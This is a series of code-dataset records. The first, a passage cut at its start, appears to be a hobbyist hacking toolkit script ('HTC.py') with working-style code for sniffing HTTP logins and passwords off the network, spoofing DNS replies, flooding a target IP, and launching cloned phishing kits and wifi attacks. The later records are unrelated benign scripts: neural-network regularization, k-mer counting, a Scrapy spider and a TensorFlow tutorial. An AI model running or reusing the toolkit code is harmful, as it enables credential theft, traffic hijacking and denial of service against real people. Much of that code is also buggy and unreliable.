*\")\r\n if wifi == \"2\": \r\n print(\"_________________________________\")\r\n print(\"select de IP and the turbo(100-x/kB of your network\")\r\n print(\"_________________________________\")\r\n IP = input(\"IP victim:\")\r\n Port = input(\"PORT:\")\r\n turbo = input(\"turbo:\")\r\n os.system(\"sudo python3 DRipper.py -s \"+IP+\" -p \"+Port+\" -t \" +turbo+ \"\")\r\n\r\ndef Ufonet():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1 or 2:\")\r\n if Ufo == \"1\":\r\n os.system(\"https://github.com/epsylon/ufonet\")\r\n os.system(\"mv ufonet/ *\")\r\n os.system(\"sudo python3 setup.py install\")\r\n os.system(\"sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy libgeoip1 libgeoip-dev\")\r\n if Ufo == \"2\":\r\n os.system(\"sudo python3 ./ufonet --gui \")\r\n time.sleep(5)\r\n webbrowser.open_new_tab(\"http://127.0.0.1:9999\")\r\ndef Phishing():\r\n customweb = input(\"Do you want to take a custom web?(Y or N):\")\r\n if customweb == \"Y\":\r\n URL = input(\"Enter the custom URL:\")\r\n os.system(\"wget \"+URL+\"\")\r\n print(\"downloading eviltrust...\")\r\n time.sleep(2)\r\n os.system(\"git clone https://github.com/s4vitar/evilTrust\")\r\n os.system(\"mv evilTrust/ *\")\r\n os.system(\"sudo bash evilTrust.sh\")\r\n if customweb == \"N\":\r\n os.system(\"git clone https://github.com/htr-tech/zphisher\")\r\n os.system(\"mv zphisher/ *\")\r\n os.system(\"sudo bash zphisher.sh\")\r\n\r\ndef checkSPY():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1 or 2:\")\r\n if SPY == \"1\":\r\n os.system(\"https://github.com/mvt-project/mvt\")\r\n if SPY == \"2\":\r\n Print(\"Recuerde conectar el telefono VIA USB\")\r\n print(\"Tambien Recuerde leer de arriba hacia abajo\")\r\n print(\"Android or IOS?\")\r\n sistem = input(\">>>\")\r\n if sistem == \"Android\":\r\n os.system(\"mvt-android check-adb\")\r\n os.system(\"mvt-android check-backup\")\r\n os.system(\"mvt-android check-bugreport\")\r\n os.system(\"mvt-android check-iocs\")\r\n print(\"Do you want to install The APK of MVT?\")\r\n nstall = input(\"Y or N?:\")\r\n if ntall == \"Y\":\r\n os.system(\"mvt-android download-apks\")\r\n if ntall == \"N\":\r\n print(\"press ctrl+C to exit\")\r\n time.sleep(1000000000000)\r\n if sistem == \"IOS\":\r\n os.system(\"mvt-ios 
check-backup\")\r\n os.system(\"mvt-ios check-fs\")\r\n os.system(\"mvt-ios check-iocs\")\r\n print(\"Do you want to install the Public Indicator?\")\r\n niostall = input(\"Y or N:\")\r\n if niostall == \"Y\":\r\n os.system(\"mvt-ios download-iocs\")\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\n if niostall == \"N\":\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\ndef sniffer():\r\n def sniff(interface):\r\n scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)\r\n\r\n def get_url(packet):\r\n return packet[http.HTTPRequest].Host + packet[http.HTTPRequesst].Path\r\n\r\n def get_login_info(packet):\r\n if packet.haslayer(scapy.Raw):\r\n load = packet[scapy.Raw].load\r\n keywords = [\"username\" , \"user\" , \"login\" , \"password\" , \"pass\"]\r\n for keyword in keywords:\r\n if keyword in load:\r\n return load \r\n def process_sniffed_packet(packet):\r\n if packet.haslayer(http.HTTPRequest):\r\n url = packet[http.HTTPREQUEST].Host + packet[http.HTTPREQUEST].path\r\n print(url)\r\n print(\"[+] HTTP Request >>>\" + url)\r\n\r\n login_info = get_login_info(packet)\r\n if login_info:\r\n print(\"\\n\\n[+] Usuario y Contraseña Posibles >\"+ login_Info + \"\\n\\n\")\r\n\r\n sniff(\"eth0\")\r\ndef DNSspoofer():\r\n dev = \"enp3s0f1\"\r\n filter = \"udp port 53\"\r\n file = None\r\n dns_map = {}\r\n\r\n def handle_packet(packet):\r\n ip = packet.getlayer(scapy.IP)\r\n udp = packet.getlayer(scapy.UDP)\r\n dns = packet.getlayer(scapy.DNS)\r\n\r\n # standard (a record) dns query\r\n if dns.qr == 0 and dns.opcode == 0:\r\n queried_host = dns.qd.qname[:-1].decode()\r\n resolved_ip = None\r\n\r\n if dns_map.get(queried_host):\r\n resolved_ip = dns_map.get(queried_host)\r\n elif dns_map.get('*'):\r\n resolved_ip = dns_map.get('*')\r\n\r\n if resolved_ip:\r\n dns_answer = scapy.DNSRR(rrname=queried_host + \".\",\r\n ttl=330,\r\n type=\"A\",\r\n rclass=\"IN\",\r\n rdata=resolved_ip)\r\n\r\n dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \\\r\n scapy.UDP(sport=udp.dport,\r\n dport=udp.sport) / \\\r\n scapy.DNS(\r\n id = dns.id,\r\n qr = 1,\r\n aa = 0,\r\n rcode = 0,\r\n qd = dns.qd,\r\n an = dns_answer\r\n )\r\n\r\n print(\"Send %s has %s to %s\" % (queried_host,\r\n resolved_ip,\r\n ip.src))\r\n scapy.send(dns_reply, iface=dev)\r\n\r\n\r\n def usage():\r\n print(sys.argv[0] + \" -f -i \")\r\n sys.exit(1)\r\n\r\n\r\n def parse_host_file(file):\r\n for line in open(file):\r\n line = line.rstrip('\\n')\r\n\r\n if line:\r\n (ip, host) = line.split()\r\n dns_map[host] = ip\r\n\r\n try:\r\n cmd_opts = \"f:i:\"\r\n opts, args = getopt.getopt(sys.argv[1:], cmd_opts)\r\n except getopt.GetoptError:\r\n usage()\r\n\r\n for opt in opts:\r\n if opt[0] == \"-i\":\r\n dev = opt[1]\r\n elif opt[0] == \"-f\":\r\n file = opt[1]\r\n else:\r\n usage()\r\n\r\n if file:\r\n parse_host_file(file)\r\n else:\r\n usage()\r\n\r\n print(\"Spoofing DNS requests on %s\" % (dev))\r\n scapy.sniff(iface=dev, filter=filter, prn=handle_packet)\r\ndef DDOS():\r\n ip = input(\"IP:\")\r\n port = input(\"PUERTO:\")\r\n hilos = input(\"Nº hilos>\")\r\n while True:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, port))\r\n s.sendto(('GET /' + ip + ' HTTP/1.1\\r\\n').encode('ascii', (ip, port)))\r\n \r\n\r\n for _ in range(hilos):\r\n thread = threading.Thread(target=attack)\r\n thread.start()\r\ndef changeMAC():\r\n print(\"ponga la interfaz actual (eth0,wlan0)\")\r\n interfaz = input(\">>>\")\r\n os.system(\"macchanger -r \"+interfaz+\"\")\r\n\r\ndef 
WPSattack():\r\n print(\" TPLINK -->> 1\")\r\n print(\" Ddos -->> 2\")\r\n print(\" Linset(Rogue AP) -->> 3\")\r\n print(\" bruteforce -->>4\")\r\n tool = input(\"?:\")\r\n if tool == \"1\":\r\n TPLINK()\r\n if tool == \"2\":\r\n os.system(\"sudo cmod +x wifiDos.sh\")\r\n os.system(\"sudo bash wifiDos.sh\")\r\n if tool == \"3\":\r\n Linset()\r\n if tool == \"4\":\r\n WifiCrack()\r\n\r\n\r\n\r\nprint(\"DNSpoofer -->> remplaza un DNS haciendo que salga otra web\")\r\nprint(\"Godkiller -->> Floodea a un numero de telefono por linea directa y manda mensajes customizados\")\r\nprint(\"phoneinfoga -->> Saca la informacion de un numero de telefono\")\r\nprint(\"password speed -->> Check the password crack speed with Sha,MD5,NTLM,LM.etc\")\r\nprint(\"BTC -->> Visuiona las transacciones recientes y el saldo de una billetera BTC\")\r\nprint(\"Sniffer -->> captura los datos de las señales HTTP y recoge la contraseña junto al usuario\")\r\nprint(\" WPS -->> Ataques a diferentes redes wifi\")\r\nprint(\"Ufonet -->> ataque Dos o Ddos a una IP con distintos protocolos\")\r\nprint(\"Ddos -->> un simple ataque distribuido\")\r\nprint(\"XSS -->> realiza un escaneo/ataque en XSS\")\r\nprint(\"vulnerabilidades -->> realiza un escaner de vulnerabilidades con spaghetti\")\r\nprint(\" Phishing -->> Un ataque phisher que puede ser juntado con el DNS spoofer \")\r\nprint(\"checkSpyware --> Detecta los software maliciosos como por ejemplo PEGASUS\")\r\nprint(\"FMhack -->> Interfiere en las radiofrecuencias\")\r\nprint(\"GPS -->> una herramienta para calcular el sitio de un emisor por ondas de radio\")\r\nprint(\"changeIP -->> cambia tu direccion IP pubica con una VPN\")\r\nprint(\"Wifi speed -->> Monitorea la velocidad wifi(puede sertvir para comprobar la tasa de flood)\")\r\nprint(\"Localflood -->> floodea un wifi creando localhosts en diversos puertos\")\r\nprint(\"MAC -->> Cambia la mac del dispositivo, asi haciendolo indetectable\")\r\nprint(\"\")\r\nprint(\"para iniciar DNSspoofer y sniffer se debe iniciar primero:\")\r\nprint(\" sudo python3 arp-spoofer.py\")\r\nprint(\" sudo iptables -I FORWARD -j NFQUEUE --queue-num 0\")\r\nprint(\"en una consola aparte.Muchas Gracias ;D\")\r\n\r\n\r\nthetool = input(\">\")\r\nif thetool == \"DNSpoofer\":\r\n DNSspoofer()\r\nif thetool == \"goodkiller\":\r\n goodkiller()\r\nif thetool == \"bruteforce\":\r\n bruteforce()\r\nif thetool == \"Wifi Speed\":\r\n wifispeed()\r\nif thetool == \"phoneinfoga\":\r\n phoneinfoga()\r\nif thetool == \"password speed\":\r\n passwordspeed()\r\nif thetool == \"BTC\":\r\n BTCanalizer()\r\nif thetool == \"sniffer\":\r\n sniffer()\r\nif thetool == \"Ddos\":\r\n DDOS()\r\nif thetool == \"Phisher\":\r\n Phishing()\r\nif thetool == \"GPS\":\r\n GPS()\r\nif thetool == \"localflood\":\r\n localflood()\r\nif thetool == \"Ufonet\":\r\n Ufonet()\r\nif thetool == \"checkSpyware\":\r\n checkSPY()\r\nif thetool == \"FMhack\":\r\n FMhack()\r\nif thetool == \"changeMAC\":\r\n changeMAC()\r\nif thetool == \"changeIP\":\r\n VPN()\r\nif thetool == \"WPS\":\r\n WPSattack()\r\nif thetool == \"XSS\":\r\n XSSattack()\r\nif thetool == \"vulnerabilidades\":\r\n vulnerability()\r\n","repo_name":"mouse3/BasicHacking","sub_path":"HTC.py","file_name":"HTC.py","file_ext":"py","file_size_in_byte":22368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74483490612","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\n\nfrom deep_learning.initialization.init_utils import forward_propagation\nfrom deep_learning.regularization.reg_utils import load_2d_data_set, compute_cost, initialize_parameters, \\\n update_parameters, backward_propagation, predict, plot_decision_boundary, predict_dec, relu, sigmoid\nfrom deep_learning.regularization.test_case import compute_cost_with_regularization_test_case, \\\n backward_propagation_with_regularization_test_case, forward_propagation_with_dropout_test_case\n\n\ndef compute_cost_with_regularization(a3: np.ndarray, y: np.ndarray, parameters: dict, lam: float):\n W_sum = 0\n for k, v in parameters.items():\n if \"W\" in k:\n W_sum += np.sum(np.square(v))\n reg = lam * W_sum / (2 * y.shape[1])\n return compute_cost(a3, y) + reg\n\n\ndef backward_propagation_with_regularization(x: np.ndarray, y: np.ndarray, cache: list, lam: float):\n m = x.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n dZ3 = A3 - y\n dW3 = np.dot(dZ3, A2.T) / m + lam * W3 / m\n db3 = np.sum(dZ3, axis=1, keepdims=True) / m\n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = np.dot(dZ2, A1.T) / m + lam * W2 / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = np.dot(dZ1, x.T) / m + lam * W1 / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) / m\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef model(x, y, learning_rate=0.3, num_iterations=30000, print_cost=True, lam=0.0, keep_prob=1.0):\n \"\"\"\n Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.\n\n Arguments:\n X -- input data, of shape (input size, number of examples)\n Y -- true \"label\" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)\n learning_rate -- learning rate of the optimization\n num_iterations -- number of iterations of the optimization loop\n print_cost -- If True, print the cost every 10000 iterations\n lambd -- regularization hyperparameter, scalar\n keep_prob - probability of keeping a neuron active during drop-out, scalar.\n\n Returns:\n parameters -- parameters learned by the model. 
They can then be used to predict.\n \"\"\"\n\n grads = {}\n costs = [] # to keep track of the cost\n layers_dims = [x.shape[0], 20, 3, 1]\n\n # Initialize parameters dictionary.\n parameters = initialize_parameters(layers_dims)\n\n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n\n # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob >= 1:\n a3, cache = forward_propagation(x, parameters)\n else:\n a3, cache = forward_propagation_with_dropout(x, parameters, keep_prob)\n # Cost function\n if lam == 0:\n cost = compute_cost(a3, y)\n else:\n cost = compute_cost_with_regularization(a3, y, parameters, lam)\n\n # Backward propagation.\n assert (lam == 0 or keep_prob == 1) # it is possible to use both L2 regularization and dropout,\n # but this assignment will only explore one at a time\n if lam == 0 and keep_prob == 1:\n grads = backward_propagation(x, y, cache)\n elif lam != 0:\n grads = backward_propagation_with_regularization(x, y, cache, lam)\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(x, y, cache, keep_prob)\n\n # Update parameters.\n parameters = update_parameters(parameters, grads, learning_rate)\n\n # Print the loss every 10000 iterations\n if print_cost and i % 10000 == 0:\n print(\"Cost after iteration {}: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n\n # plot the cost\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n return parameters\n\n\ndef forward_propagation_with_dropout(x, parameters, keep_prob=0.5):\n np.random.seed(1)\n\n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n\n Z1 = np.dot(W1, x) + b1\n A1 = relu(Z1)\n D1 = np.random.rand(A1.shape[0], A1.shape[1])\n D1 = D1 < keep_prob\n A1 = A1 * D1 / keep_prob\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n D2 = np.random.rand(A2.shape[0], A2.shape[1])\n D2 = D2 < keep_prob\n A2 = A2 * D2 / keep_prob\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n return A3, cache\n\n\ndef backward_propagation_with_dropout(x, y, cache, keep_prob):\n m = x.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n\n dZ3 = A3 - y\n dW3 = 1. / m * np.dot(dZ3, A2.T)\n db3 = 1. / m * np.sum(dZ3, axis=1, keepdims=True)\n dA2 = np.dot(W3.T, dZ3)\n dA2 = dA2 * D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation\n dA2 = dA2 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1. / m * np.dot(dZ2, A1.T)\n db2 = 1. / m * np.sum(dZ2, axis=1, keepdims=True)\n\n dA1 = np.dot(W2.T, dZ2)\n dA1 = dA1 * D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation\n dA1 = dA1 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1. / m * np.dot(dZ1, x.T)\n db1 = 1. 
/ m * np.sum(dZ1, axis=1, keepdims=True)\n\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef plot_regularization_l2():\n train_x, train_y, test_x, test_y = load_2d_data_set()\n parameters = model(train_x, train_y, lam=0.7)\n print(\"On the train set:\")\n predict(train_x, train_y, parameters)\n print(\"On the test set:\")\n predict(test_x, test_y, parameters)\n\n plt.title(\"Model with L2-regularization\")\n axes = plt.gca()\n axes.set_xlim([-0.75, 0.40])\n axes.set_ylim([-0.75, 0.65])\n plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\ndef plot_drop_out():\n train_x, train_y, test_x, test_y = load_2d_data_set()\n\n parameters = model(train_x, train_y, keep_prob=0.86, learning_rate=0.3)\n print(\"On the train set:\")\n predict(train_x, train_y, parameters)\n print(\"On the test set:\")\n predict(test_x, test_y, parameters)\n\n plt.title(\"Model with dropout\")\n axes = plt.gca()\n axes.set_xlim([-0.75, 0.40])\n axes.set_ylim([-0.75, 0.65])\n plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\nplot_drop_out()\n","repo_name":"YaoIna/PythonStart","sub_path":"deep_learning/regularization/regularization.py","file_name":"regularization.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
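The L2 term that compute_cost_with_regularization adds on top of the base cost can be checked in isolation. A minimal sketch, assuming a parameters dict of NumPy weight matrices keyed "W1", "W2", ... (the shapes and numbers below are made up):

import numpy as np

def l2_penalty(parameters, lam, m):
    # sum of squared entries of every weight matrix, scaled by lambda / (2m)
    w_sum = sum(np.sum(np.square(v)) for k, v in parameters.items() if k.startswith("W"))
    return lam * w_sum / (2 * m)

params = {"W1": np.ones((3, 2)), "b1": np.zeros((3, 1))}
print(l2_penalty(params, lam=0.7, m=10))  # 0.7 * 6 / 20 = 0.21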
+{"seq_id":"19478911784","text":"# Find the most frequent k-mers in a DNA string\n\nimport collections\n\n# Asking for the DNA string\n\ndna = input(\"DNA string?\")\nprint(\"Length of DNA string:\", len(dna))\n\n# Asking for the length of k\n\n\ndef input_k (message):\n while True:\n try:\n user_input = int(input(message))\n except ValueError:\n print(\"Not a valid number.\")\n print(\"Please enter a number!\")\n continue\n else:\n return user_input\n break\n\n\nk = input_k(\"Please enter the length of k:\")\n\n# Asking for the allowed error\n\n\ndef input_m(message):\n while True:\n try:\n user_input = int(input(message))\n except ValueError:\n print(\"Not a valid number.\")\n print(\"Please enter a number!\")\n continue\n else:\n return user_input\n break\n\n\nm = input_m (\"Please enter the allowed error:\")\n\n# Counting function\nin_mistake = m\nout_result = []\nkmer_list = []\n\n\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError()\n else:\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\n\nfor i in range(len(dna)-k + 1):\n v = dna[i:i + k]\n out_result.append(v)\n\n\nfor i in range(len(out_result) - 1):\n for j in range(i+1, len(out_result)):\n if hamming_distance(str(out_result[i]), str(out_result[j])) <= in_mistake:\n kmer_list.extend([out_result[i], out_result[j]])\n\n\nkmer_count = collections.Counter(kmer_list).most_common(14)\n\nprint(\"Most frequent kmers:\", (kmer_count))\n\n\n\n","repo_name":"pnawrath/bioinfomatics","sub_path":"finding k-mers.py","file_name":"finding k-mers.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41561546801","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom ..pdf2txt import readPDF\nimport os\n\nclass BaiInfoNews(scrapy.Spider):\n name = 'baiinfo_news'\n\n def start_requests(self):\n url = 'http://www.baiinfo.com/Orders/NewsList/7704'\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(url, headers=headers, callback=self.parse)\n\n def parse(self, response):\n news_list = response.xpath('//div[@class=\"news_more_left\"]/ul/li')\n for news in news_list:\n title = news.xpath('a//text()').extract_first().replace('/', '-')\n url = news.xpath('a/@href').extract_first()\n publish_date = news.xpath('span/text()').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n if 'Orders' in url:\n url = 'http://www.baiinfo.com' + url\n yield scrapy.Request(url,\n headers=headers,\n meta={'title': title, 'publish_date': publish_date},\n callback=self.detail_parse)\n\n page_info = response.xpath('//div[@class=\"news_tel_4\"]/ul/div/a')\n for curr in page_info:\n page_indentify = curr.xpath('text()').extract_first()\n if page_indentify == '下一页':\n next_page = 'http://www.baiinfo.com' + curr.xpath('@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(next_page, headers=headers, callback=self.parse)\n\n def detail_parse(self, response):\n title = response.meta['title']\n publish_date = response.meta['publish_date']\n file_dir = self.path + '/' + publish_date\n self.logger.info(publish_date)\n self.logger.info(title)\n\n file_path = self.path + '/' + publish_date + '/' + title # no include extention\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n content = ''.join(response.xpath('//ul[@class=\"news_tel_z\"]//text()').extract())\n if '点击下载' in content:\n pdf_url = response.xpath('//ul[@class=\"news_tel_z\"]/div[@class=\"news_tex\"]//a/@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(pdf_url, headers=headers, meta={'file_path': file_path}, callback=self.downloads)\n else:\n with open(file_path+'.txt', 'w') as f:\n f.write(content)\n\n def downloads(self, response):\n file_path = response.meta['file_path']\n with open(file_path+'.pdf', 'wb') as f:\n f.write(response.body)\n ret = readPDF(file_path+'.pdf')\n","repo_name":"csyezheng/web-scraping-examples","sub_path":"baiinfo_news/baiinfo_news/spiders/baiinfo_news.py","file_name":"baiinfo_news.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"15972225091","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n'''\n\n#Central to TF is tensors. Primitive values shaped into an array. Rank is dimensions. Shape is tuple of ints specifying arrays length\n#numpy arrays represent tensors\n\n#The TF core is the computational graph and running it in a session\n\n# Graphs have Operations representing nodes, and tensors as edges\n\na = tf.constant(3.0, dtype=tf.float32)\nb = tf.constant(4.0) # also tf.float32 implicitly\ntotal = a + b\n\nprint(a)\nprint(b)\nprint(total)\n\n\n\n#The above outputs the computational graph, each with a unique name. Not values.\n\n\n# evaluation requires creating a tf.Session object.\n\nsess = tf.Session()\nprint(sess.run(total))\n\nprint(sess.run({'ab':(a, b), 'total':total}))\n\nvec = tf.random_uniform(shape=(3,))\nout1 = vec + 1\nout2 = vec + 2\nprint(sess.run(vec))\nprint(sess.run(vec))\nprint(sess.run((out1, out2)))\n\n# A ML graph needs variable result. Placeholders are designed to hold future values\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\nz = x + y\n\nprint(sess.run(z, feed_dict={x: 3, y: 4.5}))\nprint(sess.run(z, feed_dict={x: [1, 3], y: [2, 4]}))\n\n#Datasets are however the preffered way of working with models\n\nmy_data = [\n [0, 1,],\n [2, 3,],\n [4, 5,],\n [6, 7,],\n]\nslices = tf.data.Dataset.from_tensor_slices(my_data)\nnext_item = slices.make_one_shot_iterator().get_next()\n\nwhile True:\n try:\n print(sess.run(next_item))\n except tf.errors.OutOfRangeError:\n break\n\n#If statefull the itterator may need to initialized\n\nr = tf.random_normal([10,3])\ndataset = tf.data.Dataset.from_tensor_slices(r)\niterator = dataset.make_initializable_iterator()\nnext_row = iterator.get_next()\n\nsess.run(iterator.initializer)\nwhile True:\n try:\n print(sess.run(next_row))\n except tf.errors.OutOfRangeError:\n break\n\n#Trainable models need values to to be modified in the graph to reach now outputs with same inputs.\n# Layers are used and package variables and opperations together.\n# A denseely-connected layer applies an opitonal activation on the output to all functions inputs\n\nx = tf.placeholder(tf.float32, shape=[None, 3])\nlinear_model = tf.layers.Dense(units=1)\ny = linear_model(x)\n\n#Initializing the layers resulting variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n#Now we can evaluate the linear model's output tensors as any otherself.\n\nprint(sess.run(y, {x: [[1, 2, 3],[4, 5, 6]]}))\n\n# Condensed removing access to the linear model layer\nx = tf.placeholder(tf.float32, shape=[None, 3])\ny = tf.layers.dense(x, units=1)\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y, {x: [[1, 2, 3], [4, 5, 6]]}))\n\n# Feature columns are easiest done with tf.feature_column.input_layer and only accepts dense columnsself.\n# Viewing requires a wrapper of indicator_column\n\nfeatures = {\n 'sales' : [[5], [10], [8], [9]],\n 'department': ['sports', 'sports', 'gardening', 'gardening']}\n\ndepartment_column = tf.feature_column.categorical_column_with_vocabulary_list(\n 'department', ['sports', 'gardening'])\ndepartment_column = tf.feature_column.indicator_column(department_column)\n\ncolumns = [\n tf.feature_column.numeric_column('sales'),\n department_column\n]\n\ninputs = tf.feature_column.input_layer(features, columns)\n\n#Feature columns have an internal state like layers and require initializationself.\n# 
Categorical columns use lookup tables requiring a different initialization, tf.tables_initializer\n\nvar_init = tf.global_variables_initializer()\ntable_init = tf.tables_initializer()\nsess = tf.Session()\nsess.run((var_init, table_init))\n\n# once sess is initialized, run\nprint(sess.run(inputs))\n\n\n# Training\n# Some arbitrary inputs\nx = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name=\"C1\")\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"C2\")\n\n#The training model with one output\nlinear_model = tf.layers.Dense(units=1, name=\"L1\")\ny_pred = linear_model(x)\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y_pred))\n\n# Loss to train\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\nprint(sess.run(loss))\n\n#Optimizers minimize the loss\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\n#iterative training\nfor i in range(100):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n'''\n\n\n\n#Completed:\n\n#The input values\nx = tf.constant([[4], [3], [2], [1]], dtype=tf.float32, name=\"X\")\n#The comparison values\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"Y_t\")\n#A dense LM\nlinear_model = tf.layers.Dense(units=1, name=\"Dense_LM\")\n'''Dense layer y_pred that takes a batch of input vectors,'''\n#assigned to y_predictions\ny_pred = linear_model(x)\n#With loss operations based on y_true labels and predictions dictated by the model\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\n'''y_pred produces a single output and MSE judges it'''\n\n#Set up the basic trainer to minimize loss\noptimizer = tf.train.GradientDescentOptimizer(0.01, name=\"gdo\")\ntrain = optimizer.minimize(loss)\n\n#set internal states\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n#Train n times, outputting a throwaway value and the loss value.\n#Put the training function and loss function into the run function.\nfor i in range(10000):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n#Run the variables through the prediction model\nprint(sess.run(y_pred))\n\n\n\n\n\n#TensorBoard is a way to visualize the graph.\nwriter = tf.summary.FileWriter('.')\nwriter.add_graph(tf.get_default_graph())\n\n# Go into the directory and type `tensorboard --logdir .` to view your graph\n\n\ninput()\n","repo_name":"ECHibiki/TesnorFlow-Exercises","sub_path":"Tensorflow Examples/TF low level.py","file_name":"TF low level.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
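As a sanity check on what the completed graph should learn: the four points admit an exact fit y = x - 4, so training ought to drive the weight toward 1.0 and the bias toward -4.0. A TensorFlow-independent check with NumPy least squares:

import numpy as np

x = np.array([4., 3., 2., 1.])
y = np.array([0., -1., -2., -3.])
A = np.stack([x, np.ones_like(x)], axis=1)   # design matrix [x, 1]
w, b = np.linalg.lstsq(A, y, rcond=None)[0]  # least-squares fit of y = w*x + b
print(w, b)  # approximately 1.0 and -4.0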
